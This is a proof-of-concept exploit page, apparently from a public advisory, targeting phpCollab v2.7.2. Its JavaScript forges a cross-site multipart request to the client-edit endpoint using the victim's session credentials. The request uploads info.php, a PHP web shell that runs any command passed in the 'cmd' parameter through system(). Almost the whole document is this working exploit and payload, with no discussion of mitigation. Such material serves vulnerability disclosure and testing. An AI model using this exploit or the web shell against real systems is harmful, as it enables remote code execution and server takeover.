#/
#* phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script
#* Author : Trung Le
#* Tutorial Video : https://youtu.be/BLFbUJ4n8hY
#* Twitter : @lethanhtrungdbp
#* Facebook : fb.com/c0nc4nh0
#/
<!DOCTYPE html>
<html>
<title>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</title>
<body>
<script type="text/javascript">
function upload(){
var xhr = new XMLHttpRequest();
xhr.open("POST", "/phpcol/clients/editclient.php?action=add&", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2273947705998934173936604226");
xhr.withCredentials = true;
var body = "-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n" +
"\r\n" +
"100000000\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="owner"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="name"\r\n" +
"\r\n" +
"100\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="address"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="phone"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="url"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="email"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="comments"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="hourly_rate"\r\n" +
"\r\n" +
"0.00\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="upload"; filename="info.php"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"<HTML><BODY>\r\n" +
"<FORM METHOD="GET" NAME="myform" ACTION="">\r\n" +
"<INPUT TYPE="text" NAME="cmd">\r\n" +
"<INPUT TYPE="submit" VALUE="Send">\r\n" +
"</FORM>\r\n" +
"<pre>\r\n" +
"<?\r\n" +
"if($_GET['cmd']) {\r\n" +
" system($_GET['cmd']);\r\n" +
" }\r\n" +
"?>\r\n" +
"</pre>\r\n" +
"</BODY></HTML>\r\n" +
"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<h3>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</h3>
<form action="#">
<button type="button" onclick=upload()>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</button>
</form><br />
<iframe
style="border:2px;border-style:dashed;color:#d3d3d3"
srcdoc="command output frame"
width="700" height="600"
name="ZSL_iframe">
</iframe>
<br />
<font size="2" color="#d3d3d3">ZSL-2016-5328</font>
</body>
</html>